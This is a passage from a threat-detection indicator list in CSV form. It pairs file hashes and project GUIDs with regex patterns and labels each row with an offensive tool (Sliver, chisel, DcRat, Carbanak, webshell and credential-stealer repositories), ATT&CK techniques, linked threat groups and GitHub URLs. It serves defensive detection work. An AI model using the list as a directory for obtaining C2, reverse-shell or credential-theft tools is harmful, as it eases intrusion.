archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","32960" "*ab0198fa0310f86c57835809a96f157d2b4c3acccb3f039dba6cfb1af51f5665*",".{0,1000}ab0198fa0310f86c57835809a96f157d2b4c3acccb3f039dba6cfb1af51f5665.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32961" "*ab0c5d37cd6817bde34337a51531c6db0dec64577b9c325e38627863c2d9bb97*",".{0,1000}ab0c5d37cd6817bde34337a51531c6db0dec64577b9c325e38627863c2d9bb97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32963" "*ab0ee603e53cd0b32f09a0c53469d09281002a783d8aa5fcea1110ef2b57df81*",".{0,1000}ab0ee603e53cd0b32f09a0c53469d09281002a783d8aa5fcea1110ef2b57df81.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32964" "*ab18ba41a3ac4e39a62403d4c926969bf73df5e364c290c87508c006df13e9a8*",".{0,1000}ab18ba41a3ac4e39a62403d4c926969bf73df5e364c290c87508c006df13e9a8.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32965" 
"*ab1b755120b2d5fb3db73f363a0b44881bc8b5e9699e27b804c9806b78de3a1b*",".{0,1000}ab1b755120b2d5fb3db73f363a0b44881bc8b5e9699e27b804c9806b78de3a1b.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","#filehash","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","32966" "*ab2aacb4caeafc909c788a9ca3cf03202b4f8a6f47dfa759975ac819652fbae4*",".{0,1000}ab2aacb4caeafc909c788a9ca3cf03202b4f8a6f47dfa759975ac819652fbae4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32968" "*ab2b75389dc3ffb194e335af335d6ba22abbc0e56815eb4f5fd7afa9ed9e72ac*",".{0,1000}ab2b75389dc3ffb194e335af335d6ba22abbc0e56815eb4f5fd7afa9ed9e72ac.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32969" "*ab2c2fad05bea1ece5e7585409c3263dcd14eab456faee47bc9f8a3b866326f1*",".{0,1000}ab2c2fad05bea1ece5e7585409c3263dcd14eab456faee47bc9f8a3b866326f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32970" "*ab2c849ba04bc802e0036244364ca131377aaa5311771331b64ebb1b02abc4d8*",".{0,1000}ab2c849ba04bc802e0036244364ca131377aaa5311771331b64ebb1b02abc4d8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32971" "*AB2E1440-7EC2-45A2-8CF3-2975DE8A57AD*",".{0,1000}AB2E1440\-7EC2\-45A2\-8CF3\-2975DE8A57AD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32972" "*ab36a5c1f20df8fb1b59154aa6aa83bba2d29a6925fb9ec134457e7d1c95bb7a*",".{0,1000}ab36a5c1f20df8fb1b59154aa6aa83bba2d29a6925fb9ec134457e7d1c95bb7a.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","32973" "*ab3fe5644df233ee6c10e09e60c7d8a7fa77aeb9eea8c99fd2a337f28e760258*",".{0,1000}ab3fe5644df233ee6c10e09e60c7d8a7fa77aeb9eea8c99fd2a337f28e760258.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - 
T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32975" "*ab47f495f2c021122da927499eead371cb128e8eee96ba6e858ba5335e8cab57*",".{0,1000}ab47f495f2c021122da927499eead371cb128e8eee96ba6e858ba5335e8cab57.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","32977" "*ab48a8d28e53fb65d460c4faa8cc44d8e00c9684b7fb4dd2598223d7e2963da6*",".{0,1000}ab48a8d28e53fb65d460c4faa8cc44d8e00c9684b7fb4dd2598223d7e2963da6.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","32978" "*ab495e19cd0752bcd83ae4f1ae0dff5ab09a756d63b22a64c718f87c04909142*",".{0,1000}ab495e19cd0752bcd83ae4f1ae0dff5ab09a756d63b22a64c718f87c04909142.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32979" "*ab4ecda5fbd41bdd97780885ba1722c096482eb3e71caddd572de82c42b28aa6*",".{0,1000}ab4ecda5fbd41bdd97780885ba1722c096482eb3e71caddd572de82c42b28aa6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32982" "*ab574153b5e7f7bef16f38ab53fcb107e2b1459426a73acf6fdd41434c94fa94*",".{0,1000}ab574153b5e7f7bef16f38ab53fcb107e2b1459426a73acf6fdd41434c94fa94.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","32984" "*ab606d61d0f3791fc8e0c64507a3210299d66e3bbefbe2101c4f7d8ca64aaf8f*",".{0,1000}ab606d61d0f3791fc8e0c64507a3210299d66e3bbefbe2101c4f7d8ca64aaf8f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32986" "*ab64b46723ed98b58c91128f0e7fd806ed1a2fd47e1960ff12c68083893d86be*",".{0,1000}ab64b46723ed98b58c91128f0e7fd806ed1a2fd47e1960ff12c68083893d86be.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32987" "*AB6CDF36-F336-4F14-8D69-3C190B7DEC65*",".{0,1000}AB6CDF36\-F336\-4F14\-8D69\-3C190B7DEC65.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","32989" "*ab7aa0e4c923f767e50914842239578d36723656befca7bec7d40926bf79c3c3*",".{0,1000}ab7aa0e4c923f767e50914842239578d36723656befca7bec7d40926bf79c3c3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by 
blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32992" "*ab7c24fe58442c46ea47fe89b2b967d733d3a35e2f363af15ddfc82c6f680509*",".{0,1000}ab7c24fe58442c46ea47fe89b2b967d733d3a35e2f363af15ddfc82c6f680509.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","32993" "*ab7d1d288bd6635e9fc098fb1a1b0dee7956ddd5b61b3a8444f0e8c8198e598a*",".{0,1000}ab7d1d288bd6635e9fc098fb1a1b0dee7956ddd5b61b3a8444f0e8c8198e598a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32994" "*ab81070a84a4b8b80543cb31f3aa3829e325fbddef1ba9f048a99c1080b8ed71*",".{0,1000}ab81070a84a4b8b80543cb31f3aa3829e325fbddef1ba9f048a99c1080b8ed71.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32997" "*ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c*",".{0,1000}ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and 
MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","#filehash","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","32998" "*ab835ce740890473adf5cc804055973b926633e39c59c2bd98da526b63e9c521*",".{0,1000}ab835ce740890473adf5cc804055973b926633e39c59c2bd98da526b63e9c521.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32999" "*AB850676-3744-4BFD-82FA-E21D19622BF9*",".{0,1000}AB850676\-3744\-4BFD\-82FA\-E21D19622BF9.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","33002" "*ab85375c8fcfcea1cf4135cc834b762c1006903496d70b795d4eb34cc6f754ec*",".{0,1000}ab85375c8fcfcea1cf4135cc834b762c1006903496d70b795d4eb34cc6f754ec.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","33003" "*ab86676468036b6f915ffcefd6e05aa56bf02459a383c46dff095d5852a996e2*",".{0,1000}ab86676468036b6f915ffcefd6e05aa56bf02459a383c46dff095d5852a996e2.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - 
T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","33004" "*ab8ef44ac5829b0b14890ad48e4f015725748a0910f1d15aa0fdd5ed911ff7cf*",".{0,1000}ab8ef44ac5829b0b14890ad48e4f015725748a0910f1d15aa0fdd5ed911ff7cf.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","33008" "*ab945e611084c9deccab6780df91caadf44977d54e61f621d2a5686a217a0a73*",".{0,1000}ab945e611084c9deccab6780df91caadf44977d54e61f621d2a5686a217a0a73.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","33009" "*ab99bbfa0e8addfa9f389a05138f21c9976a07a984c74ea0066c6c2aefe2afde*",".{0,1000}ab99bbfa0e8addfa9f389a05138f21c9976a07a984c74ea0066c6c2aefe2afde.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","33010" "*ab9be1fb31bcdae806b2396f6274a8c3fee03647adc9449c99e886c57b0d271d*",".{0,1000}ab9be1fb31bcdae806b2396f6274a8c3fee03647adc9449c99e886c57b0d271d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","33012" "*ab9bed9d63e2a83e2cea3d4a88311208a8032cb6b9be86876cea1a1fad870269*",".{0,1000}ab9bed9d63e2a83e2cea3d4a88311208a8032cb6b9be86876cea1a1fad870269.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","33013" 
"*ab9f2bf9d733a41af5323b5cabe31812d43eef41cb6dcfea9ac47308c91428e3*",".{0,1000}ab9f2bf9d733a41af5323b5cabe31812d43eef41cb6dcfea9ac47308c91428e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33014" "*abb2f26f4a3048ecb57a4329da21ce6fb438c4b22e49a31c0fd23ff4acc1bd68*",".{0,1000}abb2f26f4a3048ecb57a4329da21ce6fb438c4b22e49a31c0fd23ff4acc1bd68.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","33016" "*abb8b93592a482b653c6d282ccad216f6cedc8bb50476aada7ee4b3562ecc9a4*",".{0,1000}abb8b93592a482b653c6d282ccad216f6cedc8bb50476aada7ee4b3562ecc9a4.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","33017" "*abb92eca9ff99f47ecad47b9ca079ba9578b5cfdd1156a3e3b09ff43a76309ed*",".{0,1000}abb92eca9ff99f47ecad47b9ca079ba9578b5cfdd1156a3e3b09ff43a76309ed.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote 
tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","33019" "*ABC32DBD-B697-482D-A763-7BA82FE9CEA2*",".{0,1000}ABC32DBD\-B697\-482D\-A763\-7BA82FE9CEA2.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#GUIDproject","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","33020" "*abc6b4e0f41a55ce44e359e7be8a5b4ee0e0174a8a4ecef0782081f7b2cee773*",".{0,1000}abc6b4e0f41a55ce44e359e7be8a5b4ee0e0174a8a4ecef0782081f7b2cee773.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33021" "*abccbb442f89dc0aeab5300964f546e81f4a1fbcb91f08b9e873da51bfd24b7f*",".{0,1000}abccbb442f89dc0aeab5300964f546e81f4a1fbcb91f08b9e873da51bfd24b7f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","33023" "*abccd127ce9c264980e3f8e8b040586a33dfe2c0e7d3e95bd79f383c09900cf9*",".{0,1000}abccd127ce9c264980e3f8e8b040586a33dfe2c0e7d3e95bd79f383c09900cf9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33024" "*abd9f4b93fc3f2bb0612bfbdef4e0da8797e985e7377ee0c08c2b5b5198c2743*",".{0,1000}abd9f4b93fc3f2bb0612bfbdef4e0da8797e985e7377ee0c08c2b5b5198c2743.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","33026" "*abd9f4b93fc3f2bb0612bfbdef4e0da8797e985e7377ee0c08c2b5b5198c2743*",".{0,1000}abd9f4b93fc3f2bb0612bfbdef4e0da8797e985e7377ee0c08c2b5b5198c2743.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","33027" "*abdfd724cc84b4f7c2fdd641acfc2427baad0e6eb6c031a53e0c25b17ebb550b*",".{0,1000}abdfd724cc84b4f7c2fdd641acfc2427baad0e6eb6c031a53e0c25b17ebb550b.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","33029" "*abdullahansari1618@outlook.com*",".{0,1000}abdullahansari1618\@outlook\.com.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#email","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","33030" "*abe2f2b0a57474c206676b14aab4801779fbbd421357586ddadec94cc5d79707*",".{0,1000}abe2f2b0a57474c206676b14aab4801779fbbd421357586ddadec94cc5d79707.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33032" 